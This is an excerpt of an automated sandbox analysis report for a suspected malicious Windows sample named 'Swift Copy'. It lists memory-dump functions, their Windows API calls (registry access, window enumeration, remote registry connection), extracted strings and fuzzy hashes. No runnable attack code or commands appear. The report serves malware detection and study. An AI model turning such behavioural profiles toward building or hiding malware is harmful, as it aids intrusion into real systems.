                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                              • String ID: (
                                              • API String ID: 2598888154-3887548279
                                              • Opcode ID: f54af76d1c4a77be3885aa6508ce7d08369a62dd74d8aa2c032f00fafc5dc9f2
                                              • Instruction ID: e1c36ebbb8129edc334210181e316db323d92547ef57cf6c23b8989a0030d526
                                              • Opcode Fuzzy Hash: f54af76d1c4a77be3885aa6508ce7d08369a62dd74d8aa2c032f00fafc5dc9f2
                                              • Instruction Fuzzy Hash: 2E61F275D00219EFCF04CFA8D884AAEBBB5FF48310F208529EA55B7250D771A951CFA0
                                              APIs
                                              • ___free_lconv_mon.LIBCMT ref: 00DADAA1
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD659
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD66B
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD67D
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD68F
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6A1
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6B3
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6C5
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6D7
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6E9
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6FB
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD70D
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD71F
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD731
                                              • _free.LIBCMT ref: 00DADA96
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • _free.LIBCMT ref: 00DADAB8
                                              • _free.LIBCMT ref: 00DADACD
                                              • _free.LIBCMT ref: 00DADAD8
                                              • _free.LIBCMT ref: 00DADAFA
                                              • _free.LIBCMT ref: 00DADB0D
                                              • _free.LIBCMT ref: 00DADB1B
                                              • _free.LIBCMT ref: 00DADB26
                                              • _free.LIBCMT ref: 00DADB5E
                                              • _free.LIBCMT ref: 00DADB65
                                              • _free.LIBCMT ref: 00DADB82
                                              • _free.LIBCMT ref: 00DADB9A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                              • String ID:
                                              • API String ID: 161543041-0
                                              • Opcode ID: 18059647d9a3c790b67114ff89ac54d5239e64553fb1bec7b141c78de260b7cd
                                              • Instruction ID: 646382d0471e58c1f6c3bd7b8937fbce5d616fcffafecba55248b7af683ca432
                                              • Opcode Fuzzy Hash: 18059647d9a3c790b67114ff89ac54d5239e64553fb1bec7b141c78de260b7cd
                                              • Instruction Fuzzy Hash: EC318D326443049FEB61AA39E845B6B77EAFF12710F294819E48AD7591DF30EC40CB31
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00DD369C
                                              • _wcslen.LIBCMT ref: 00DD36A7
                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00DD3797
                                              • GetClassNameW.USER32(?,?,00000400), ref: 00DD380C
                                              • GetDlgCtrlID.USER32(?), ref: 00DD385D
                                              • GetWindowRect.USER32(?,?), ref: 00DD3882
                                              • GetParent.USER32(?), ref: 00DD38A0
                                              • ScreenToClient.USER32(00000000), ref: 00DD38A7
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00DD3921
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00DD395D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                              • String ID: %s%u
                                              • API String ID: 4010501982-679674701
                                              • Opcode ID: b1357378017baee7f35add24b283f6aa03d3efb6b03bf7a607774266f2c65353
                                              • Instruction ID: bfcfab8b0faee9c47420adb0444c850cf36bd93014f6b2282362e9f46bdf7c1e
                                              • Opcode Fuzzy Hash: b1357378017baee7f35add24b283f6aa03d3efb6b03bf7a607774266f2c65353
                                              • Instruction Fuzzy Hash: 2591F871204706AFD715DF24C895FAAF7A8FF44350F04462AF999D2290DB31EA49CBB2
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000400), ref: 00DD4994
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00DD49DA
                                              • _wcslen.LIBCMT ref: 00DD49EB
                                              • CharUpperBuffW.USER32(?,00000000), ref: 00DD49F7
                                              • _wcsstr.LIBVCRUNTIME ref: 00DD4A2C
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00DD4A64
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00DD4A9D
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00DD4AE6
                                              • GetClassNameW.USER32(?,?,00000400), ref: 00DD4B20
                                              • GetWindowRect.USER32(?,?), ref: 00DD4B8B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                              • String ID: ThumbnailClass
                                              • API String ID: 1311036022-1241985126
                                              • Opcode ID: edbea543d01ecb1712f0da2f110d10c6f5872e7f3e5647e28205dc579f6cdecf
                                              • Instruction ID: bf17995617dd2b6ea49dd734f88b5b06d390da7819bc17711a934fbba81165e3
                                              • Opcode Fuzzy Hash: edbea543d01ecb1712f0da2f110d10c6f5872e7f3e5647e28205dc579f6cdecf
                                              • Instruction Fuzzy Hash: 9591DE310042059FDB04CF14C985BAAB7E8FF54714F08856BFD899A296EB31ED49CBB1
                                              APIs
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DFCC64
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00DFCC8D
                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DFCD48
                                                • Part of subcall function 00DFCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00DFCCAA
                                                • Part of subcall function 00DFCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00DFCCBD
                                                • Part of subcall function 00DFCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DFCCCF
                                                • Part of subcall function 00DFCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DFCD05
                                                • Part of subcall function 00DFCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DFCD28
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DFCCF3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                              • API String ID: 2734957052-4033151799
                                              • Opcode ID: d43043300fcf7759bbd6b2a54a921e9ad875192051f56221101513b0ad11751a
                                              • Instruction ID: 853ed75dd0d504e64cd3b0067a0e5d5ae797ade0addcd79572430a923c36b096
                                              • Opcode Fuzzy Hash: d43043300fcf7759bbd6b2a54a921e9ad875192051f56221101513b0ad11751a
                                              • Instruction Fuzzy Hash: 8C318D7190112CBFDB208B91DD88EFFBB7CEF45750F154265BA06E2240DB309A89DAB0
                                              APIs
                                              • timeGetTime.WINMM ref: 00DDE6B4
                                                • Part of subcall function 00D8E551: timeGetTime.WINMM(?,?,00DDE6D4), ref: 00D8E555
                                              • Sleep.KERNEL32(0000000A), ref: 00DDE6E1
                                              • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00DDE705
                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00DDE727
                                              • SetActiveWindow.USER32 ref: 00DDE746
                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DDE754
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00DDE773
                                              • Sleep.KERNEL32(000000FA), ref: 00DDE77E
                                              • IsWindow.USER32 ref: 00DDE78A
                                              • EndDialog.USER32(00000000), ref: 00DDE79B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                              • String ID: BUTTON
                                              • API String ID: 1194449130-3405671355
                                              • Opcode ID: bfac60d44e5d2da68d60312f9bf6331bbe3eb77ccedf7196cfebbb7f68fc2cf5
                                              • Instruction ID: c7ab268b0b841188a472224f90c112483798146b9520702774cb47480cf67547
                                              • Opcode Fuzzy Hash: bfac60d44e5d2da68d60312f9bf6331bbe3eb77ccedf7196cfebbb7f68fc2cf5
                                              • Instruction Fuzzy Hash: C521F674200200BFEB106F33EC89A363B69F755748F65156AF505A52A1DB72EC8D9B31
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DDEA5D
                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DDEA73
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DDEA84
                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DDEA96
                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DDEAA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: SendString$_wcslen
                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                              • API String ID: 2420728520-1007645807
                                              • Opcode ID: f08a6e2de07379bc915b184d8f0047994d492c64401070d21dd40877252f3577
                                              • Instruction ID: 6d0376fe64c26a678c20b906671264d7183753fba4044dd77c5eb8aa62040464
                                              • Opcode Fuzzy Hash: f08a6e2de07379bc915b184d8f0047994d492c64401070d21dd40877252f3577
                                              • Instruction Fuzzy Hash: 9C115131A9026979D720B7B6DC4AEFF6F7CEBD1B00F04542A7415A60D1EF704945C5B0
                                              APIs
                                              • GetDlgItem.USER32(?,00000001), ref: 00DD5CE2
                                              • GetWindowRect.USER32(00000000,?), ref: 00DD5CFB
                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00DD5D59
                                              • GetDlgItem.USER32(?,00000002), ref: 00DD5D69
                                              • GetWindowRect.USER32(00000000,?), ref: 00DD5D7B
                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00DD5DCF
                                              • GetDlgItem.USER32(?,000003E9), ref: 00DD5DDD
                                              • GetWindowRect.USER32(00000000,?), ref: 00DD5DEF
                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00DD5E31
                                              • GetDlgItem.USER32(?,000003EA), ref: 00DD5E44
                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00DD5E5A
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00DD5E67
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$ItemMoveRect$Invalidate
                                              • String ID:
                                              • API String ID: 3096461208-0
                                              • Opcode ID: 6fb1e8f26fa3ebce0e9f9ef5e427afde8323938f5ac722a5c0719e1382790f04
                                              • Instruction ID: ef00aee3ac0f77eabb6d62c95607067ba57f0d2aea87d3b54b608336338ce0af
                                              • Opcode Fuzzy Hash: 6fb1e8f26fa3ebce0e9f9ef5e427afde8323938f5ac722a5c0719e1382790f04
                                              • Instruction Fuzzy Hash: 7B514170B00605AFDF18CF69DD89AAE7BB5FB48700F248229F515E7294D7719E44CB60
                                              APIs
                                                • Part of subcall function 00D88F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D88BE8,?,00000000,?,?,?,?,00D88BBA,00000000,?), ref: 00D88FC5
                                              • DestroyWindow.USER32(?), ref: 00D88C81
                                              • KillTimer.USER32(00000000,?,?,?,?,00D88BBA,00000000,?), ref: 00D88D1B
                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00DC6973
                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00D88BBA,00000000,?), ref: 00DC69A1
                                              • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00D88BBA,00000000,?), ref: 00DC69B8
                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D88BBA,00000000), ref: 00DC69D4
                                              • DeleteObject.GDI32(00000000), ref: 00DC69E6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                              • String ID:
                                              • API String ID: 641708696-0
                                              • Opcode ID: 9c37e545d2a88695270ec64bec0e47726d1ab5380b63e5138edc37a8532d8d0d
                                              • Instruction ID: 332e3011917421c8fa9b6dbd880b7b742297cfcdb14191332f781a0fae3c45b6
                                              • Opcode Fuzzy Hash: 9c37e545d2a88695270ec64bec0e47726d1ab5380b63e5138edc37a8532d8d0d
                                              • Instruction Fuzzy Hash: A161AB34102601DFDB25AF26D948B2977F1FB81312F58455CE182AB5A4CB32E8C9EFB0
                                              APIs
                                                • Part of subcall function 00D89944: GetWindowLongW.USER32(?,000000EB), ref: 00D89952
                                              • GetSysColor.USER32(0000000F), ref: 00D89862
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ColorLongWindow
                                              • String ID:
                                              • API String ID: 259745315-0
                                              • Opcode ID: 5b1e8fc5014cced86511f8d163d3aa4dffb2858aa4fb1b065a81037b34d9c1bf
                                              • Instruction ID: 1fef07c00c9c1fda81f0fb6a79e11c356f1e0d6dadaccae263a2c163f8753458
                                              • Opcode Fuzzy Hash: 5b1e8fc5014cced86511f8d163d3aa4dffb2858aa4fb1b065a81037b34d9c1bf
                                              • Instruction Fuzzy Hash: A7419D31104641AFDB206F399C98BB97BB5EB06320F2C461AF9E2971E1C7319C82DB30
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00DBF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00DD9717
                                              • LoadStringW.USER32(00000000,?,00DBF7F8,00000001), ref: 00DD9720
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00DBF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00DD9742
                                              • LoadStringW.USER32(00000000,?,00DBF7F8,00000001), ref: 00DD9745
                                              • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00DD9866
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message_wcslen
                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                              • API String ID: 747408836-2268648507
                                              • Opcode ID: bf21c7c12647dd7e81eb5c69e39e79989bc985ca9a635452559d9bed5404efa1
                                              • Instruction ID: 654f9a9f119a55440382e4e2c7108a816536af0753da9b2b21d5e15309e9a71e
                                              • Opcode Fuzzy Hash: bf21c7c12647dd7e81eb5c69e39e79989bc985ca9a635452559d9bed5404efa1
                                              • Instruction Fuzzy Hash: EC413A72800219AACB14EBE0CD96DEEB778EF55740F608126F60972192FA356F48CB71
                                              APIs
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00DD07A2
                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00DD07BE
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00DD07DA
                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00DD0804
                                              • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00DD082C
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DD0837
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DD083C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
